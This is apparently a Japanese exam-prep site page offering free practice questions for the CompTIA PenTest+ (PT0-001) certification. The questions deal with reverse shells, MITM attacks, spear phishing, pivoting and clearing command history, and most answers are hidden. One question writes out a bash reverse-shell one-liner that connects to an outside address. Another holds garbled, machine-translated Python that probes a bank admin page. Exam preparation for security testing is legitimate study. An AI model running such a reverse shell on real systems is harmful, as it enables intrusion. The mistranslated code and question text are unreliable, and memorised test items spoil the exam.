次の認定試験に速く合格する!

簡単に認定試験を準備し、学び、そして合格するためにすべてが必要だ。

会員センター  カート (0)

PT0-001日本語 無料問題集「CompTIA PenTest+ Certification Exam (PT0-001日本語版)」

ページ: 1 / 16
トータル 295 問
完全版を入手する
ペネトレーションテスタは、ポート443を介して任意のホストに無制限のネットワークを持つシステムを危険にさらします。侵入テスト担当者は、被害者から攻撃者に戻るためのリバースシェルを作成しようとしています。侵入テスト担当者は、次の方法のうちどれを使用するのが好きですか?

解説: (JPNTest メンバーにのみ表示されます)
侵入テスト担当者は、ソーシャルメディアを利用して会社の従業員に関する情報を収集しています。テスターは、従業員のプロファイルで使用されている人気のある単語のリストを作成しました。次の種類の攻撃のうちどれに対してこの情報が使用されますか?

スピアフィッシング攻撃の例はどれですか?

金融機関がペネトレーションテスターに、詐欺行為を引き起こす結託機能が存在するかどうかを判断するよう求めています。次の脅威のうちどの要素が評価の際に侵入テスト担当者に説明されるべきですか?

ペネトレーションテスターがWebベースの銀行業務アプリケーションに対してブラックボックス評価を実行しています。テスターにはログインページへのURLのみが提供されました。以下のコードを入力して、BeautifulSoupからのインポート要求をインポートしてください。BeautifulSoup request = requests.get( "https://www.bank.com/admin")respHeaders、respBody = request [0]。 respHeader.statuscode == 200の場合は、[1]を要求します。
soup = BeautifulSoup(respBody)
soup = soup.FindAll( "div"、( "type": "hidden")))
respHeaderを印刷します。 StatusCode、StatusMessage
それ以外の場合
respHeaderを印刷します。 StatusCode、StatusMessage
出力:200 OK
テスターは次のうちどれをするつもりですか?

技術者が次のレポートを確認しています。この情報を前提として、誤検知である各脆弱性の「確認済み」列に「誤検知」トークンをドラッグすることにより、どの脆弱性が誤検知であると明確に確認できるかを特定します。
正解:
ペネトレーションテスタは、Webアプリケーションの脆弱性スキャンレポートをクライアントに配信します。 侵入テスターは、脆弱性を中程度の深刻度と評価しています。 同じ脆弱性が以前のレポートで重大な重大度の発見として報告されました。 次のうちどれが深刻度の低下の最も可能性の高い理由ですか?

セキュリティコンサルタントが、範囲内のいずれかのVLANにSCADAデバイスを見つけました。次の行動のどれが最もデバイスに対して潜在的に有害な結果を生み出すでしょうか?

悪意のあるユーザーがコンピュータにMITM攻撃を仕掛けたいと考えています。コンピュータのネットワーク構成は以下のとおりです。
IP:192.168.1.20
NETMASK:255.255.255.0
デフォルトゲートウェイ:192.168.1.254
DHCP:192.168.1.253
DNS:192.168.10.10、192.168.20.10
悪意のあるユーザーがMITM攻撃を仕掛けるために実行するべき次のコマンドはどれですか。

次のPythonコードがあるとします。
a = 'abcdefghijklmnop'
a [:: 2]
次のうちどれが結果になりますか?

ペネトレーションテスターは、運用に対するリスクの全体的なレベルを概説するレポートを作成中です。侵入テスト担当者は、報告の以下の領域のどれにこれを載せるべきですか?

テスターは、ターゲットシステムで次のコマンドを実行しようとしています。
bash -i >& /dev/tcp/10.2.4.6/443 0> &1
次の追加のコマンドのどれが前のコマンドを成功させるためにテスターのLinuxシステム上で実行される必要があるでしょうか?

ペネトレーションテスタがアプリケーションの脆弱性を悪用したため、Linuxセッションからコマンド履歴を削除したいと考えています。次のうちどれがこれを成功させるのでしょうか?

何をテストし、テストから生成される結果を正確に定義することは、防止に役立ちますか?

ペネトレーションテスターは、施設に物理的にアクセスし、内部ネットワークに直接接続しています。
ペネトレーションテスターは、サーバーVLANにピボットする必要があります。次のうちどれがこれを達成しますか?

ペネトレーションテスターは、組織の認証サーバーの脆弱性を悪用することに成功し、リバースシェルを設定したいと考えています。ペネトレーションテスターは、Netcatがターゲットで利用できないことを検出します。
次のアプローチのうち、NEXTを試行するのに適したオプションはどれですか?

以下のBESTのどれが、ペネトレーションテストを実行する際に特定された発見の機密性を維持することが重要なのかを説明していますか?

侵入テスターは、会社の外部侵入評価を実行するために割り当てられています。 次のうちどれが受動的情報収集プロセスに最も役立つでしょうか。 (2つ選んでください。)

正解:A、D 解答を投票する
展示ボタンをクリックしてください。

展示物に示されているNiktoの脆弱性スキャンの出力を考えれば、ターゲットシステムを悪用するために使用される可能性のある悪用テクニックはどれですか? (2つ選択)

正解:B、C 解答を投票する
ページ: 1 / 16
トータル 295 問

弊社を連絡する

我々は12時間以内ですべてのお問い合わせを答えます。

オンラインサポート時間:( UTC+9 ) 9:00-24:00
月曜日から土曜日まで

サポート:現在連絡 

関連リンク

トップ試験